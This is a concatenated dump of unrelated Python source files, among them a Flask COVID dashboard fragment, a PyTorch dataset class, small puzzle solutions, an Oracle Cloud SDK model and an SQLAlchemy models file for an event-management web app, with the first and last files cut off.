"Extract covid rates in Exeter from corresponding json file."
public_health_exeter_req()
with open('json_files/public_health_exeter.json', 'r') as file:
exeter_file = json.load(file, strict=False)
try:
date_yes = exeter_file["data"][0]["date"]
area_name = exeter_file["data"][0]["areaName"]
new_cases = exeter_file["data"][0]["newCasesByPublishDate"]
cumulative_cases = exeter_file["data"][0]["cumCasesByPublishDate"]
except:
logging.error("Error occurred while passing information from API")
date_yes = "ERROR-404"
area_name = "ERROR-404"
new_cases = "ERROR-404"
cumulative_cases = "ERROR-404"
file.close()
logging.info("covid rates in exeter extracted")
return date_yes, area_name, new_cases, cumulative_cases
def public_health_england():
"Extract covid rates in England from corresponding json file."
public_health_england_req()
with open('json_files/public_health_england.json', 'r') as file:
exeter_file = json.load(file, strict=False)
try:
date_yes = exeter_file["data"][0]["date"]
area_name = exeter_file["data"][0]["areaName"]
new_cases = exeter_file["data"][0]["newCasesByPublishDate"]
cumulative_cases = exeter_file["data"][0]["cumCasesByPublishDate"]
except:
logging.error("Error occurred while passing information from API")
date_yes = "ERROR-404"
area_name = "ERROR-404"
new_cases = "ERROR-404"
cumulative_cases = "ERROR-404"
file.close()
logging.info("covid rates in england extracted")
return date_yes, area_name, new_cases, cumulative_cases
#main function--------
@app.route('/index')
def main_scheduler():
"Render template and connect other functions to allow full functionality."
#access config file
with open("json_files/config.json","r") as config:
config_file = json.load(config,strict=False)
logfile = config_file["filepaths"]["logfile"]
config.close()
#create a log file to store a log of events and errors
logging.basicConfig(filename=logfile,level=logging.INFO)
s.run(blocking=False)
cancel_alarm = request.args.get("alarm_item")
#cancel alarms if the x button is pressed
if cancel_alarm:
logging.info("alarm cancelled")
with open("json_files/alarms.json","r") as file:
alarms_file = json.load(file, strict=False)
file.close()
label = cancel_alarm.replace("ALARM LABEL: ","")
#cancels alarms (removes alarm from json file)
del alarms_file["data"][label]
with open("json_files/alarms.json","w") as updated_file:
json.dump(alarms_file, updated_file, indent=2)
updated_file.close()
notifications, alarms = title_content()
storing_alarms()
#access image from config file
with open("json_files/config.json",'r') as file:
config_file = json.load(file, strict=False)
image = config_file["filepaths"]["image"]
template = config_file["filepaths"]["template"]
file.close()
return render_template(template,notifications=notifications, alarms=alarms, image=image)
if __name__ == '__main__':
app.run()
|
py | 7dfaf9f68c2362f9b3c7e341d7deeb3ed0234447 | import os
from random import random
from PIL import Image, ImageFilter
from torch.utils import data
import numpy as np
from torchvision import transforms as T
from torchvision.datasets import ImageFolder
class MyDataset(data.Dataset):
def __init__(self, root, transforms=None, train=True, test=False):
"""
主要目标: 获取所有图片的地址,并根据训练,验证,测试划分数据
"""
self.test = test
# imgs = [os.path.join(root, img) for img in os.listdir(root)]
imgs = []
dataset = ImageFolder(root)
self.data_classes = dataset.classes
imgs = [dataset.imgs[i][0] for i in range(len(dataset.imgs))]
labels = [dataset.imgs[i][1] for i in range(len(dataset.imgs))]
self.imgs_num = len(imgs)
self.imgs = imgs
self.labels = labels
if transforms is not None:
self.transforms = transforms
def id_to_class(self, index):
return self.data_classes(index)
def __getitem__(self, index):
"""
一次返回一张图片的数据
"""
img_path = self.imgs[index]
label = self.labels[index]
img = Image.open(img_path)
aug_img = self.transforms(img)
data = aug_img
return data, label
def __len__(self):
return self.imgs_num |
py | 7dfafaded80d332f22fb0dbf0c2c631ecf384ead | import sys
poly_string = input()
alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
def get_length(poly_string_in):
done = False
while done is False:
is_finished = True
for index in range(len(poly_string_in) - 1):
first = poly_string_in[index]
second = poly_string_in[index + 1]
if (first.lower() == second and first == second.upper()) or (first.upper() == second and first == second.lower()):
poly_string_in = poly_string_in[:index] + poly_string_in[index + 2:]
is_finished = False
break
done = is_finished
return len(poly_string_in)
longest = 1000000000
for character in alphabet:
print(character)
poly_string_in = poly_string.replace(character, '')
poly_string_in = poly_string_in.replace(character.upper(), '')
poly_string_in_len = get_length(poly_string_in)
if poly_string_in_len < longest:
longest = poly_string_in_len
print(longest) |
py | 7dfafdf4f88e9ced5b8295b818199662287f1702 | localized = True
from .. import BaseProvider
class Provider(BaseProvider):
formats = ('###-###-###',)
msisdn_formats = (
'#############',
)
def phone_number(self):
return self.numerify(self.random_element(self.formats))
def msisdn(self):
""" https://en.wikipedia.org/wiki/MSISDN """
return self.numerify(self.random_element(self.msisdn_formats))
|
py | 7dfafe02c822c1c3aca18418e2a5644f4b3b4be6 | class Palindromize:
def minAdds(self, s):
for i in xrange(len(s)):
r = s + s[:i][::-1]
if r == r[::-1]:
return r
|
py | 7dfafe0cb5f1b223841957690ae79fceb085fdf3 | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class DisassociateMonitoredResourcesDetails(object):
"""
The information required to create new monitored resource association.
"""
def __init__(self, **kwargs):
"""
Initializes a new DisassociateMonitoredResourcesDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param compartment_id:
The value to assign to the compartment_id property of this DisassociateMonitoredResourcesDetails.
:type compartment_id: str
:param association_type:
The value to assign to the association_type property of this DisassociateMonitoredResourcesDetails.
:type association_type: str
:param source_resource_id:
The value to assign to the source_resource_id property of this DisassociateMonitoredResourcesDetails.
:type source_resource_id: str
:param destination_resource_id:
The value to assign to the destination_resource_id property of this DisassociateMonitoredResourcesDetails.
:type destination_resource_id: str
"""
self.swagger_types = {
'compartment_id': 'str',
'association_type': 'str',
'source_resource_id': 'str',
'destination_resource_id': 'str'
}
self.attribute_map = {
'compartment_id': 'compartmentId',
'association_type': 'associationType',
'source_resource_id': 'sourceResourceId',
'destination_resource_id': 'destinationResourceId'
}
self._compartment_id = None
self._association_type = None
self._source_resource_id = None
self._destination_resource_id = None
@property
def compartment_id(self):
"""
**[Required]** Gets the compartment_id of this DisassociateMonitoredResourcesDetails.
Compartment Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The compartment_id of this DisassociateMonitoredResourcesDetails.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this DisassociateMonitoredResourcesDetails.
Compartment Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param compartment_id: The compartment_id of this DisassociateMonitoredResourcesDetails.
:type: str
"""
self._compartment_id = compartment_id
@property
def association_type(self):
"""
Gets the association_type of this DisassociateMonitoredResourcesDetails.
Association type to be created between source and destination resources
:return: The association_type of this DisassociateMonitoredResourcesDetails.
:rtype: str
"""
return self._association_type
@association_type.setter
def association_type(self, association_type):
"""
Sets the association_type of this DisassociateMonitoredResourcesDetails.
Association type to be created between source and destination resources
:param association_type: The association_type of this DisassociateMonitoredResourcesDetails.
:type: str
"""
self._association_type = association_type
@property
def source_resource_id(self):
"""
Gets the source_resource_id of this DisassociateMonitoredResourcesDetails.
Source Monitored Resource Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The source_resource_id of this DisassociateMonitoredResourcesDetails.
:rtype: str
"""
return self._source_resource_id
@source_resource_id.setter
def source_resource_id(self, source_resource_id):
"""
Sets the source_resource_id of this DisassociateMonitoredResourcesDetails.
Source Monitored Resource Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param source_resource_id: The source_resource_id of this DisassociateMonitoredResourcesDetails.
:type: str
"""
self._source_resource_id = source_resource_id
@property
def destination_resource_id(self):
"""
Gets the destination_resource_id of this DisassociateMonitoredResourcesDetails.
Destination Monitored Resource Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The destination_resource_id of this DisassociateMonitoredResourcesDetails.
:rtype: str
"""
return self._destination_resource_id
@destination_resource_id.setter
def destination_resource_id(self, destination_resource_id):
"""
Sets the destination_resource_id of this DisassociateMonitoredResourcesDetails.
Destination Monitored Resource Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param destination_resource_id: The destination_resource_id of this DisassociateMonitoredResourcesDetails.
:type: str
"""
self._destination_resource_id = destination_resource_id
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
py | 7dfafe85b15cd14253ad76b506377573823385c0 | #
# simpleArith.py
#
# Example of defining an arithmetic expression parser using
# the infixNotation helper method in mo_parsing.
#
# Copyright 2006, by Paul McGuire
#
from mo_parsing import *
integer = Word(nums).add_parse_action(lambda t: int(t[0]))
variable = Word(alphas, exact=1)
operand = integer | variable
expop = Literal("^")
signop = one_of("+ -")
multop = one_of("* /")
plusop = one_of("+ -")
factop = Literal("!")
# To use the infixNotation helper:
# 1. Define the "atom" operand term of the grammar.
# For this simple grammar, the smallest operand is either
# and integer or a variable. This will be the first argument
# to the infixNotation method.
# 2. Define a list of tuples for each level of operator
# precendence. Each tuple is of the form
# (op_expr, numTerms, rightLeftAssoc, parse_action), where
# - op_expr is the mo_parsing expression for the operator;
# may also be a string, which will be converted to a Literal
# - numTerms is the number of terms for this operator (must
# be 1 or 2)
# - rightLeftAssoc is the indicator whether the operator is
# right or left associative, using the mo_parsing-defined
# constants RIGHT_ASSOC and LEFT_ASSOC.
# - parse_action is the parse action to be associated with
# expressions matching this operator expression (the
# parse action tuple member may be omitted)
# 3. Call infixNotation passing the operand expression and
# the operator precedence list, and save the returned value
# as the generated mo_parsing expression. You can then use
# this expression to parse input strings, or incorporate it
# into a larger, more complex grammar.
#
expr = infix_notation(
operand,
[
("!", 1, LEFT_ASSOC),
("^", 2, RIGHT_ASSOC),
(signop, 1, RIGHT_ASSOC),
(multop, 2, LEFT_ASSOC),
(plusop, 2, LEFT_ASSOC),
],
)
test = [
"9 + 2 + 3",
"9 + 2 * 3",
"(9 + 2) * 3",
"(9 + -2) * 3",
"(9 + -2) * 3^2^2",
"(9! + -2) * 3^2^2",
"M*X + B",
"M*(X + B)",
"1+2*-3^4*5+-+-6",
]
for t in test:
|
py | 7dfafe8c292e0536f80922270586ce28810361d7 | import os
import bspump.declarative
import bspump.unittest
class TestDeclarativeAdd(bspump.unittest.TestCase):
def setUp(self) -> None:
super().setUp()
self.Builder = bspump.declarative.ExpressionBuilder(self.App)
def load(self, decl_fname):
basedir = os.path.dirname(__file__)
with open(os.path.join(basedir, decl_fname), 'r') as f:
return self.Builder.parse(f.read())[0]
def test_add_01(self):
event = {
'string1': "STRING1",
'string2': "STRING2",
}
decl = self.load('./test_add_01.yaml')
res = decl({}, event)
self.assertEqual(res, "STRING1STRING2")
def test_add_02(self):
decl = self.load('./test_add_02.yaml')
res = decl({}, {})
self.assertEqual(res, 3)
bspump.declarative.declaration_to_dot(decl, './test_add_02.dot')
|
py | 7dfafee8f9910b7637cd9f6cbe89a2287b184712 | from pandas_profiling.report.presentation.core import FrequencyTableSmall
from pandas_profiling.report.presentation.flavours.html import templates
class HTMLFrequencyTableSmall(FrequencyTableSmall):
def render(self):
return templates.template("frequency_table_small.html").render(
rows=self.content
)
|
py | 7dfaff389454ade8b88f05482fe543582b29a997 | import datetime
import time
from enum import IntEnum
from authlib.integrations.sqla_oauth2 import (
OAuth2AuthorizationCodeMixin,
OAuth2ClientMixin,
OAuth2TokenMixin,
)
from dateutil.relativedelta import relativedelta
from flask import request
from flask_dance.consumer.storage.sqla import OAuthConsumerMixin
from flask_security import RoleMixin, UserMixin, current_user
from geoalchemy2 import Geometry
from sqlalchemy import (
Boolean,
Column,
DateTime,
ForeignKey,
Integer,
Numeric,
String,
Unicode,
UnicodeText,
UniqueConstraint,
and_,
func,
select,
)
from sqlalchemy.event import listens_for
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.orm import aliased, backref, deferred, object_session, relationship
from sqlalchemy.orm.relationships import remote
from sqlalchemy.schema import CheckConstraint
from sqlalchemy.sql.operators import op
from sqlalchemy_utils import ColorType
from project import db
from project.dateutils import gmt_tz
from project.dbtypes import IntegerEnum
from project.utils import make_check_violation
# Base
def create_tsvector(*args):
field, weight = args[0]
exp = func.setweight(func.to_tsvector("german", func.coalesce(field, "")), weight)
for field, weight in args[1:]:
exp = op(
exp,
"||",
func.setweight(
func.to_tsvector("german", func.coalesce(field, "")), weight
),
)
return exp
def _current_user_id_or_none():
if current_user and current_user.is_authenticated:
return current_user.id
return None
class TrackableMixin(object):
@declared_attr
def created_at(cls):
return deferred(
Column(DateTime, default=datetime.datetime.utcnow), group="trackable"
)
@declared_attr
def updated_at(cls):
return deferred(
Column(
DateTime,
default=datetime.datetime.utcnow,
onupdate=datetime.datetime.utcnow,
),
group="trackable",
)
@declared_attr
def created_by_id(cls):
return deferred(
Column(
"created_by_id",
ForeignKey("user.id"),
default=_current_user_id_or_none,
),
group="trackable",
)
@declared_attr
def created_by(cls):
return relationship(
"User",
primaryjoin="User.id == %s.created_by_id" % cls.__name__,
remote_side="User.id",
)
@declared_attr
def updated_by_id(cls):
return deferred(
Column(
"updated_by_id",
ForeignKey("user.id"),
default=_current_user_id_or_none,
onupdate=_current_user_id_or_none,
),
group="trackable",
)
@declared_attr
def updated_by(cls):
return relationship(
"User",
primaryjoin="User.id == %s.updated_by_id" % cls.__name__,
remote_side="User.id",
)
# Global
class Settings(db.Model, TrackableMixin):
__tablename__ = "settings"
id = Column(Integer(), primary_key=True)
tos = Column(UnicodeText())
legal_notice = Column(UnicodeText())
contact = Column(UnicodeText())
privacy = Column(UnicodeText())
# Multi purpose
class Image(db.Model, TrackableMixin):
__tablename__ = "image"
id = Column(Integer(), primary_key=True)
data = deferred(db.Column(db.LargeBinary))
encoding_format = Column(String(80))
copyright_text = Column(Unicode(255))
def is_empty(self):
return not self.data
def get_hash(self):
return (
int(self.updated_at.replace(tzinfo=gmt_tz).timestamp() * 1000)
if self.updated_at
else 0
)
# User
class RolesUsers(db.Model):
__tablename__ = "roles_users"
id = Column(Integer(), primary_key=True)
user_id = Column("user_id", Integer(), ForeignKey("user.id"))
role_id = Column("role_id", Integer(), ForeignKey("role.id"))
class Role(db.Model, RoleMixin):
__tablename__ = "role"
id = Column(Integer(), primary_key=True)
name = Column(String(80), unique=True)
title = Column(Unicode(255))
description = Column(String(255))
permissions = Column(UnicodeText())
class User(db.Model, UserMixin):
__tablename__ = "user"
id = Column(Integer, primary_key=True)
email = Column(String(255), unique=True)
username = Column(String(255))
password = Column(String(255))
last_login_at = Column(DateTime())
current_login_at = Column(DateTime())
last_login_ip = Column(String(100))
current_login_ip = Column(String(100))
login_count = Column(Integer)
active = Column(Boolean())
fs_uniquifier = Column(String(255))
confirmed_at = Column(DateTime())
roles = relationship(
"Role", secondary="roles_users", backref=backref("users", lazy="dynamic")
)
def get_user_id(self):
return self.id
# OAuth Consumer: Wenn wir OAuth consumen und sich ein Nutzer per Google oder Facebook anmelden möchte
class OAuth(OAuthConsumerMixin, db.Model):
provider_user_id = Column(String(256), unique=True, nullable=False)
user_id = Column(Integer(), ForeignKey("user.id"), nullable=False)
user = db.relationship("User")
# OAuth Server: Wir bieten an, dass sich ein Nutzer per OAuth2 auf unserer Seite anmeldet
class OAuth2Client(db.Model, OAuth2ClientMixin):
__tablename__ = "oauth2_client"
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey("user.id", ondelete="CASCADE"))
user = db.relationship("User")
@OAuth2ClientMixin.grant_types.getter
def grant_types(self):
return ["authorization_code", "refresh_token"]
@OAuth2ClientMixin.response_types.getter
def response_types(self):
return ["code"]
@OAuth2ClientMixin.token_endpoint_auth_method.getter
def token_endpoint_auth_method(self):
return ["client_secret_basic", "client_secret_post", "none"]
def check_redirect_uri(self, redirect_uri):
if redirect_uri.startswith(request.host_url): # pragma: no cover
return True
return super().check_redirect_uri(redirect_uri)
def check_token_endpoint_auth_method(self, method):
return method in self.token_endpoint_auth_method
class OAuth2AuthorizationCode(db.Model, OAuth2AuthorizationCodeMixin):
__tablename__ = "oauth2_code"
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey("user.id", ondelete="CASCADE"))
user = db.relationship("User")
class OAuth2Token(db.Model, OAuth2TokenMixin):
__tablename__ = "oauth2_token"
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey("user.id", ondelete="CASCADE"))
user = db.relationship("User")
@property
def client(self):
return (
object_session(self)
.query(OAuth2Client)
.filter(OAuth2Client.client_id == self.client_id)
.first()
)
def is_refresh_token_active(self):
if self.revoked:
return False
expires_at = self.issued_at + self.expires_in * 2
return expires_at >= time.time()
# Admin Unit
class AdminUnitMemberRolesMembers(db.Model):
__tablename__ = "adminunitmemberroles_members"
id = Column(Integer(), primary_key=True)
member_id = Column("member_id", Integer(), ForeignKey("adminunitmember.id"))
role_id = Column("role_id", Integer(), ForeignKey("adminunitmemberrole.id"))
class AdminUnitMemberRole(db.Model, RoleMixin):
__tablename__ = "adminunitmemberrole"
id = Column(Integer(), primary_key=True)
name = Column(String(80), unique=True)
title = Column(Unicode(255))
description = Column(String(255))
permissions = Column(UnicodeText())
class AdminUnitMember(db.Model):
__tablename__ = "adminunitmember"
id = Column(Integer(), primary_key=True)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey("user.id"), nullable=False)
user = db.relationship("User", backref=db.backref("adminunitmembers", lazy=True))
roles = relationship(
"AdminUnitMemberRole",
secondary="adminunitmemberroles_members",
order_by="AdminUnitMemberRole.id",
backref=backref("members", lazy="dynamic"),
)
class AdminUnitMemberInvitation(db.Model):
__tablename__ = "adminunitmemberinvitation"
__table_args__ = (UniqueConstraint("email", "admin_unit_id"),)
id = Column(Integer(), primary_key=True)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
email = Column(String(255))
roles = Column(UnicodeText())
class AdminUnitInvitation(db.Model, TrackableMixin):
__tablename__ = "adminunitinvitation"
id = Column(Integer(), primary_key=True)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
email = Column(String(255), nullable=False)
admin_unit_name = Column(String(255))
relation_auto_verify_event_reference_requests = Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
relation_verify = Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
class AdminUnitRelation(db.Model, TrackableMixin):
__tablename__ = "adminunitrelation"
__table_args__ = (
UniqueConstraint("source_admin_unit_id", "target_admin_unit_id"),
CheckConstraint("source_admin_unit_id != target_admin_unit_id"),
)
id = Column(Integer(), primary_key=True)
source_admin_unit_id = db.Column(
db.Integer, db.ForeignKey("adminunit.id", ondelete="CASCADE"), nullable=False
)
target_admin_unit_id = db.Column(
db.Integer, db.ForeignKey("adminunit.id", ondelete="CASCADE"), nullable=False
)
auto_verify_event_reference_requests = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
verify = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
invited = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
def validate(self):
source_id = (
self.source_admin_unit.id
if self.source_admin_unit
else self.source_admin_unit_id
)
target_id = (
self.target_admin_unit.id
if self.target_admin_unit
else self.target_admin_unit_id
)
if source_id == target_id:
raise make_check_violation("There must be no self-reference.")
@listens_for(AdminUnitRelation, "before_insert")
@listens_for(AdminUnitRelation, "before_update")
def before_saving_admin_unit_relation(mapper, connect, self):
self.validate()
class AdminUnit(db.Model, TrackableMixin):
__tablename__ = "adminunit"
id = Column(Integer(), primary_key=True)
name = Column(Unicode(255), unique=True)
short_name = Column(Unicode(100), unique=True)
members = relationship(
"AdminUnitMember",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
invitations = relationship(
"AdminUnitMemberInvitation",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
admin_unit_invitations = relationship(
"AdminUnitInvitation",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
events = relationship(
"Event", cascade="all, delete-orphan", backref=backref("admin_unit", lazy=True)
)
eventsuggestions = relationship(
"EventSuggestion",
cascade="all, delete-orphan",
backref=backref("admin_unit", lazy=True),
)
references = relationship(
"EventReference",
cascade="all, delete-orphan",
backref=backref("admin_unit", lazy=True),
)
reference_requests = relationship(
"EventReferenceRequest",
cascade="all, delete-orphan",
backref=backref("admin_unit", lazy=True),
)
event_organizers = relationship(
"EventOrganizer",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
event_places = relationship(
"EventPlace",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
event_lists = relationship(
"EventList",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
location_id = deferred(db.Column(db.Integer, db.ForeignKey("location.id")))
location = db.relationship(
"Location", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
logo_id = deferred(db.Column(db.Integer, db.ForeignKey("image.id")))
logo = db.relationship(
"Image", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
url = deferred(Column(String(255)), group="detail")
email = deferred(Column(Unicode(255)), group="detail")
phone = deferred(Column(Unicode(255)), group="detail")
fax = deferred(Column(Unicode(255)), group="detail")
widget_font = deferred(Column(Unicode(255)), group="widget")
widget_background_color = deferred(Column(ColorType), group="widget")
widget_primary_color = deferred(Column(ColorType), group="widget")
widget_link_color = deferred(Column(ColorType), group="widget")
incoming_reference_requests_allowed = deferred(Column(Boolean()))
suggestions_enabled = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
can_create_other = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
can_verify_other = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
can_invite_other = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
outgoing_relations = relationship(
"AdminUnitRelation",
primaryjoin=remote(AdminUnitRelation.source_admin_unit_id) == id,
single_parent=True,
cascade="all, delete-orphan",
passive_deletes=True,
backref=backref(
"source_admin_unit",
lazy=True,
),
)
incoming_relations = relationship(
"AdminUnitRelation",
primaryjoin=remote(AdminUnitRelation.target_admin_unit_id) == id,
cascade="all, delete-orphan",
passive_deletes=True,
backref=backref(
"target_admin_unit",
lazy=True,
),
)
@hybrid_property
def is_verified(self):
if not self.incoming_relations:
return False
return any(
r.verify and r.source_admin_unit.can_verify_other
for r in self.incoming_relations
)
@is_verified.expression
def is_verified(cls):
SourceAdminUnit = aliased(AdminUnit)
j = AdminUnitRelation.__table__.join(
SourceAdminUnit,
AdminUnitRelation.source_admin_unit_id == SourceAdminUnit.id,
)
return (
select([func.count()])
.select_from(j)
.where(
and_(
AdminUnitRelation.verify,
AdminUnitRelation.target_admin_unit_id == cls.id,
SourceAdminUnit.can_verify_other,
)
)
.as_scalar()
> 0
)
def purge(self):
if self.logo and self.logo.is_empty():
self.logo_id = None
@listens_for(AdminUnit, "before_insert")
@listens_for(AdminUnit, "before_update")
def before_saving_admin_unit(mapper, connect, self):
self.purge()
@listens_for(AdminUnit.can_invite_other, "set")
def set_admin_unit_can_invite_other(target, value, oldvalue, initiator):
if (
not value
and target.admin_unit_invitations
and len(target.admin_unit_invitations) > 0
):
target.admin_unit_invitations = []
# Universal Types
class Location(db.Model, TrackableMixin):
__tablename__ = "location"
id = Column(Integer(), primary_key=True)
street = Column(Unicode(255))
postalCode = Column(Unicode(255))
city = Column(Unicode(255))
state = Column(Unicode(255))
country = Column(Unicode(255))
latitude = Column(Numeric(18, 16))
longitude = Column(Numeric(19, 16))
coordinate = Column(Geometry(geometry_type="POINT"))
def __init__(self, **kwargs):
super(Location, self).__init__(**kwargs)
def is_empty(self):
return (
not self.street
and not self.postalCode
and not self.city
and not self.state
and not self.country
and not self.latitude
and not self.longitude
)
def update_coordinate(self):
if self.latitude and self.longitude:
point = "POINT({} {})".format(self.longitude, self.latitude)
self.coordinate = point
else:
self.coordinate = None
@classmethod
def update_coordinates(cls):
locations = Location.query.filter(
and_(
Location.latitude is not None,
Location.latitude != 0,
Location.coordinate is None,
)
).all()
for location in locations: # pragma: no cover
location.update_coordinate()
db.session.commit()
@listens_for(Location, "before_insert")
@listens_for(Location, "before_update")
def update_location_coordinate(mapper, connect, self):
self.update_coordinate()
# Events
class EventPlace(db.Model, TrackableMixin):
__tablename__ = "eventplace"
__table_args__ = (UniqueConstraint("name", "admin_unit_id"),)
id = Column(Integer(), primary_key=True)
name = Column(Unicode(255), nullable=False)
location_id = db.Column(db.Integer, db.ForeignKey("location.id"))
location = db.relationship(
"Location", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
photo_id = db.Column(db.Integer, db.ForeignKey("image.id"))
photo = db.relationship(
"Image", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
url = Column(String(255))
description = Column(UnicodeText())
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=True)
@listens_for(EventPlace, "before_insert")
@listens_for(EventPlace, "before_update")
def purge_event_place(mapper, connect, self):
if self.location and self.location.is_empty():
self.location_id = None
if self.photo and self.photo.is_empty():
self.photo_id = None
class EventCategory(db.Model):
__tablename__ = "eventcategory"
id = Column(Integer(), primary_key=True)
name = Column(Unicode(255), nullable=False, unique=True)
class EventTargetGroupOrigin(IntEnum):
both = 1
tourist = 2
resident = 3
class EventAttendanceMode(IntEnum):
offline = 1
online = 2
mixed = 3
class EventStatus(IntEnum):
scheduled = 1
cancelled = 2
movedOnline = 3
postponed = 4
rescheduled = 5
class EventReviewStatus(IntEnum):
inbox = 1
verified = 2
rejected = 3
class EventRejectionReason(IntEnum):
duplicate = 1
untrustworthy = 2
illegal = 3
class EventReferenceRequestReviewStatus(IntEnum):
inbox = 1
verified = 2
rejected = 3
class EventReferenceRequestRejectionReason(IntEnum):
duplicate = 1
untrustworthy = 2
illegal = 3
irrelevant = 4
class PublicStatus(IntEnum):
draft = 1
published = 2
class EventOrganizer(db.Model, TrackableMixin):
__tablename__ = "eventorganizer"
__table_args__ = (UniqueConstraint("name", "admin_unit_id"),)
id = Column(Integer(), primary_key=True)
name = Column(Unicode(255), nullable=False)
url = deferred(Column(String(255)), group="detail")
email = deferred(Column(Unicode(255)), group="detail")
phone = deferred(Column(Unicode(255)), group="detail")
fax = deferred(Column(Unicode(255)), group="detail")
location_id = deferred(db.Column(db.Integer, db.ForeignKey("location.id")))
location = db.relationship(
"Location", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
logo_id = deferred(db.Column(db.Integer, db.ForeignKey("image.id")))
logo = db.relationship(
"Image", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=True)
@listens_for(EventOrganizer, "before_insert")
@listens_for(EventOrganizer, "before_update")
def purge_event_organizer(mapper, connect, self):
if self.logo and self.logo.is_empty():
self.logo_id = None
class EventReference(db.Model, TrackableMixin):
__tablename__ = "eventreference"
__table_args__ = (
UniqueConstraint(
"event_id", "admin_unit_id", name="eventreference_event_id_admin_unit_id"
),
)
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
rating = Column(Integer(), default=50)
def sanitize_allday_instance(instance):
if instance.allday:
from project.dateutils import date_set_begin_of_day, date_set_end_of_day
instance.start = date_set_begin_of_day(instance.start)
if instance.end:
instance.end = date_set_end_of_day(instance.end)
else:
instance.end = date_set_end_of_day(instance.start)
class EventReferenceRequest(db.Model, TrackableMixin):
__tablename__ = "eventreferencerequest"
__table_args__ = (
UniqueConstraint(
"event_id",
"admin_unit_id",
name="eventreferencerequest_event_id_admin_unit_id",
),
)
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
review_status = Column(IntegerEnum(EventReferenceRequestReviewStatus))
rejection_reason = Column(IntegerEnum(EventReferenceRequestRejectionReason))
@hybrid_property
def verified(self):
return self.review_status == EventReferenceRequestReviewStatus.verified
class EventMixin(object):
name = Column(Unicode(255), nullable=False)
external_link = Column(String(255))
description = Column(UnicodeText(), nullable=True)
ticket_link = Column(String(255))
tags = Column(UnicodeText())
kid_friendly = Column(Boolean())
accessible_for_free = Column(Boolean())
age_from = Column(Integer())
age_to = Column(Integer())
target_group_origin = Column(IntegerEnum(EventTargetGroupOrigin))
attendance_mode = Column(IntegerEnum(EventAttendanceMode))
registration_required = Column(Boolean())
booked_up = Column(Boolean())
expected_participants = Column(Integer())
price_info = Column(UnicodeText())
@declared_attr
def __ts_vector__(cls):
return create_tsvector((cls.name, "A"), (cls.tags, "B"), (cls.description, "C"))
@declared_attr
def photo_id(cls):
return Column("photo_id", ForeignKey("image.id"))
@declared_attr
def photo(cls):
return relationship(
"Image", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
def purge_event_mixin(self):
if self.photo and self.photo.is_empty():
self.photo_id = None
class EventSuggestion(db.Model, TrackableMixin, EventMixin):
__tablename__ = "eventsuggestion"
__table_args__ = (
